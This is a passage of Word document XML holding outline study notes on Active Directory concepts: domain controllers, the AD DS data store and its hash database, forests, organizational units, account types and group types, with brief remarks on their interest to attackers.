          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA7CD94" w14:textId="4A76AF0E" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46268A7F" w14:textId="7FE60B0E" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37431C8F" w14:textId="63D0C90B" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows for control and monitoring of user’s computers through a single domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBDA880" w14:textId="612D3E51" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Allows a single user to sign </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> any computer on the active directory network and have access to stored files and folders, as well as local machine storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCA3A3" w14:textId="32DB1B99" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Physical Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE844A" w14:textId="6F229052" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Servers and machines on-premises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C077D85" w14:textId="38E67F47" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DADA0DA" w14:textId="477C3CD9" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows server that has Active Directory Domain Services (AD DS) and has been promoted to domain controller in the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04373889" w14:textId="27467321" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Center of Active Directory – control rest of domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB8E8E" w14:textId="6ABD37D0" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Holds AD DS data store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781321D1" w14:textId="336BC039" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Handles authentication/authorization services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA1B54" w14:textId="3ACDB45E" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Replicate updates from other domain controllers in the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D581D" w14:textId="7007DFC3" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows admin access to manage domain resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79203838" w14:textId="43D37C91" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00FF07BF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AD DS Data Store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235EA490" w14:textId="27FE11F7" w:rsidR="00FF07BF" w:rsidRPr="0084205E" w:rsidRDefault="00FF07BF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Holds the databases and processes needed to store and manage directory information such as users, groups, and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903EB53" w14:textId="5EA2AA4F" w:rsidR="00FF07BF" w:rsidRPr="0084205E" w:rsidRDefault="00FF07BF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – database that contains </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> the information of an Active Directory domain controller as well as password hashes for domain users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C8965" w14:textId="56AB82C7" w:rsidR="00FF07BF" w:rsidRPr="0084205E" w:rsidRDefault="00FF07BF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stored by default in %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>%\NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4F665" w14:textId="0F2611EB" w:rsidR="00FF07BF" w:rsidRPr="0084205E" w:rsidRDefault="00FF07BF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Accessible only by the domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A154D" w14:textId="712C83ED" w:rsidR="00FF07BF" w:rsidRPr="0084205E" w:rsidRDefault="00FF07BF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDFF47" w14:textId="39A98745" w:rsidR="00FF07BF" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Defines all other things – container that holds all other pieces of network together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7438D" w14:textId="2D6FC565" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4849D" w14:textId="23D60258" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Collection of one or more domain trees inside of an Active Directory network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424B80B" w14:textId="7F1F9FC4" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Categorizes the parts of the network as a whole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B412AA5" w14:textId="3D065BF9" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Trees – hierarchy of domains in AD DS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38032870" w14:textId="517CAC41" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domains – used to group and manage objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E91BC5" w14:textId="75BAF199" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Organizational Units – Container for groups, computers, users, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>printers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and other OUs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD37D8F" w14:textId="67503988" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Trusts – Allows users to access resources in other domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC1437" w14:textId="55424E5F" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Objects – users, groups, printers, computers, shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC580CE" w14:textId="43AC2C8C" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Services – DNS Server, LLMNR, IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35C1B7" w14:textId="5DBFC4D6" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Schema – Rules for object creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF2235" w14:textId="0115B64A" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users and Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FEDC25" w14:textId="0F34DB1B" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C651BA" w14:textId="417C0FD6" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users are core to Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F785A9C" w14:textId="0791C849" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Four Main Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD4027" w14:textId="109DC96E" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Admins – control domains and are the only ones with access to the domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10454CB7" w14:textId="0671CA38" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service Accounts (Can be Domain Admins) – rarely used except for service maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56677E17" w14:textId="4D292611" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Required by Windows for services such as SQL to pair a service with a service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6397C" w14:textId="18D61E91" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F5F04" w14:textId="54B4FF36" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Make changes to local machines as an admin, but cannot access the domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF9103" w14:textId="589B28FB" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Users – everyday users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537FFD99" w14:textId="6C1D3A72" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="00C71506" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Groups Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38582106" w14:textId="0F77DB62" w:rsidR="00C71506" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Groups divided into specified permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427EBF0" w14:textId="45731636" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B27E962" w14:textId="7909968D" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Security Groups – used to specify permissions for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>a large number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE1936F" w14:textId="6A1508A0" w:rsidR="001D66FE" w:rsidRPr="0084205E" w:rsidRDefault="001D66FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Distribution Groups – used to specify email distribution lists. Less beneficial to attackers but assist in enumeration</w:t>
      </w:r>
    </w:p>
